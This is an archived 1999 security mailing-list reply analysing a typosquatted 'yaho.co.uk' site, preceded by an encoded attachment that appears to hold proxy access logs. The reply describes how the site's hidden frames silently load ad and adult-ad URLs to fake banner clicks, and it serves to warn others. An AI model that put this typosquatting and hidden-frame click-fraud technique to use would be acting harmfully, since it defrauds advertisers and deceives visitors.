OjgwODAvaW1nL3BvcnR1Z2FsLmdpZiBIVFRQLzEuMCIgMjAwIDEyNzMNCnN1cHBvcnQuZ2VtaW5p LXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NTQgKzAwMDBdICJHRVQgaHR0 cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9zd2VlZGlzaC5naWYgSFRUUC8xLjAi IDIwMCAxMDgzDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5 OjE4OjE3OjU0ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFudGFzeS5jb206ODA4MC9p bWcvd2lubW9uZXkuZ2lmIEhUVFAvMS4wIiAyMDAgMzE2Nw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3 LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2l0YWxpYW4uZ2lmIEhUVFAvMS4wIiAyMDAgMTA2 Ng0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1 NSArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2NoaXRl eHQuZ2lmIEhUVFAvMS4wIiAyMDAgODkyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt IC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjU2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuQ2FzaW5vRmFu dGFzeS5jb206ODA4MC9pbWcvYnV0dG9uc2UuZ2lmIEhUVFAvMS4wIiAyMDAgMzY0OQ0Kc3VwcG9y dC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo1NiArMDAwMF0g IkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2VudHJhbmNlaGVhZGVy LmdpZiBIVFRQLzEuMCIgMjAwIDczMTkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g LSBbMDgvRmViLzE5OTk6MTg6MTg6MDMgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50 YXN5LmNvbTo4MDgwL2ltZy9lbnRyYW5jZWdpcmwuZ2lmIEhUVFAvMS4wIiAyMDAgMTc3NTINCnN1 cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MDUgKzAw MDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9lbnRyYW5jZS5n aWYgSFRUUC8xLjAiIDIwMCA1NjcwNQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAt IFswOC9GZWIvMTk5OToxODoxODoxMCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNv bS8gSFRUUC8xLjAiIDIwMCA1MjU1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g WzA4L0ZlYi8xOTk5OjE4OjE4OjExICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMuY29t L2ltYWdlcy9iYXJyaWdodHllbC5naWYgSFRUUC8xLjAiIDIwMCA5MTgNCnN1cHBvcnQuZ2VtaW5p LXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MTIgKzAwMDBdICJHRVQgaHR0 cDovL3d3dy5zdGFyc2Fkcy5jb20vaW1hZ2VzL2JhcjExYi5naWYgSFRUUC8xLjAiIDIwMCA1MzUN CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTg6MTIg KzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vaW1hZ2VzL2JhcnJpZ2h0LmdpZiBI VFRQLzEuMCIgMjAwIDkxNQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G ZWIvMTk5OToxODoxODoxMiArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFn ZXMvYmFyMTBiLmdpZiBIVFRQLzEuMCIgMjAwIDUzMg0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2gu Y28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxMyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0 YXJzYWRzLmNvbS9jZ2ktYmluL3NlcnZlLmNnaT9JRD1OZXRzdGFycyBIVFRQLzEuMCIgMzAyIDI5 MQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODox MyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvbmV0c2NhcGU0Lmdp ZiBIVFRQLzEuMCIgMjAwIDk4Ng0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFsw OC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9p bWFnZXMvYmFyMTBhLmdpZiBIVFRQLzEuMCIgMjAwIDUyNg0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0gIkdFVCBodHRwOi8vd3d3 LnN0YXJzYWRzLmNvbS9pbWFnZXMvYmFyMTFhLmdpZiBIVFRQLzEuMCIgMjAwIDUyNw0Kc3VwcG9y dC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxNCArMDAwMF0g IkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvYmFyZG93bnllbC5naWYgSFRUUC8x LjAiIDIwMCA5MTQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5 OTk6MTg6MTg6MTUgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vYXguY2dpP2xv Z28uZ2lmIEhUVFAvMS4wIiAzMDIgMjYwDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt IC0gWzA4L0ZlYi8xOTk5OjE4OjE4OjE1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuc3RhcnNhZHMu Y29tL2Jhbm5lcnMvdXNhLmdpZiBIVFRQLzEuMCIgMjAwIDEwMzE2DQpzdXBwb3J0LmdlbWluaS1y ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE4OjE2ICswMDAwXSAiR0VUIGh0dHA6 Ly93d3cuc3RhcnNhZHMuY29tL2ltYWdlcy9iYXJkb3duLmdpZiBIVFRQLzEuMCIgMjAwIDkxNg0K c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxODoxOCAr MDAwMF0gIkdFVCBodHRwOi8vd3d3LnN0YXJzYWRzLmNvbS9pbWFnZXMvaWUzLmdpZiBIVFRQLzEu MCIgMjAwIDExMTENCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5 OTk6MTg6MTg6MTkgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vbG9nby5naWYg SFRUUC8xLjAiIDIwMCA0MzgxDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4 L0ZlYi8xOTk5OjE4OjIwOjQ2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cueWFob28uY28udWsvIEhU VFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIv MTk5OToxODoyMDo0NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy91 a19tYWluNGMuZ2lmIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u dWsgLSAtIFswOC9GZWIvMTk5OToxODoyMDo0NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9v LmNvLnVrL2Fkdi9pbWFnZXMveWNsaWNrX3dvcmsyX2htcGdfdWsuZ2lmIEhUVFAvMS4wIiAzMDQg LQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoyMDo0 NyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy9zbS5naWYgSFRUUC8x LjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5 OjE4OjIxOjA2ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cueWFob28uY29tLyBIVFRQLzEuMCIgMjAw IDkyMTENCg== --=_5A0DDE8C.57365AD0-- * Next message: Michael: "FakeBo 0.3.1 & nmap" * Previous message: David LeBlanc: "Re: ISS Internet Scanner Cannot be relied upon for conclusive" * Next in thread: Paul McGovern: "Re: Spoofed Yahoo web site - www.yaho.co.uk" Re: Spoofed Yahoo web site - www.yaho.co.uk Paul McGovern (isles@LAMER.NET) Tue, 9 Feb 1999 17:49:00 -0500 * Messages sorted by: [ date ][ thread ][ subject ][ author ] * Next message: Brandon S. Allbery: "Re: SSH 1.x and 2.x Daemon" * Previous message: A. C. Eufemio: "Security Scanners and other Auditing Tools [was Re: ISS Internet" * In reply to: Paul Murphy: "Spoofed Yahoo web site - www.yaho.co.uk" On Mon, 8 Feb 1999, Paul Murphy wrote: | Hi, | | You might like to try this one on for size, and advise whether there's | anything nasty going on behind this site..... Going to this site in lynx, we're given a page with the following link on it: The requested URL probably is: http://www.yahoo.co.uk however, the link behind this is actually http://www.aae.net/typo/typolink.shtml. Following this link takes you to a page with one main frame (which has the actual link to http://www.yahoo.co.uk) and 14 others, which under netscape for linux are hidden. However, of course, lynx tells us where they go :> the sites they lead to are: http://199.217.203.16/stats.asp?sb5553 http://www.gaytradition.com/trafficcash/trafficcash.cgi?nutzw1 http://cgi2.hotshots.net/0/nutzw1 http://adultad.hotlynxxx.com/hotapi.wsa/GIF1852 http://ad.xxxteen.com/INDEX_2632.shtml http://ad.xxxpic.com/adult/21/INDEX_2675.shtml http://ad.xxxteen.com/INDEX_2709.shtml http://ad.mpgworld.com/INDEX_2661.shtml http://ad.xxxteen.com/indexmain.shtml http://ad.xxxpic.com/adult/21/start.htm http://ad.mpgworld.com/start.htm with a couple of them repeated. Under netscape for linux, it automatically refreshed my browser to www.yahoo.co.uk but watching the status bar i could see netscape trying to look up all of these sites so I know it was working in the background to connect to those sites. Pretty harmless, looks to me like someone's little scheme to generate fake 'banner clicks,' pretty lame but more original than spamming eh? Anyway, it doesn't look like this has anything malicious like a session watcher behind it, just someone's idea of making a little spare cash. Of course, I could be wrong... this is all just speculation :> Regards, -=--=--=--=--=--=--=--=--=--=--=--=--=--=- Paul McGovern (nyisles) - isles@lamer.net BSBW Public Library - Technical Assistant Administrator - redemption.bc.ca.xnet.org Administrator - krad.fef.net http://www.krad.org (under construction) -=--=--=--=--=--=--=--=--=--=--=--=--=--=- * Next message: Brandon S. Allbery: "Re: SSH 1.x and 2.x Daemon" * Previous message: A. C. Eufemio: "Security Scanners and other Auditing Tools [was Re: ISS Internet" * In reply to: Paul Murphy: "Spoofed Yahoo web site - www.yaho.co.uk"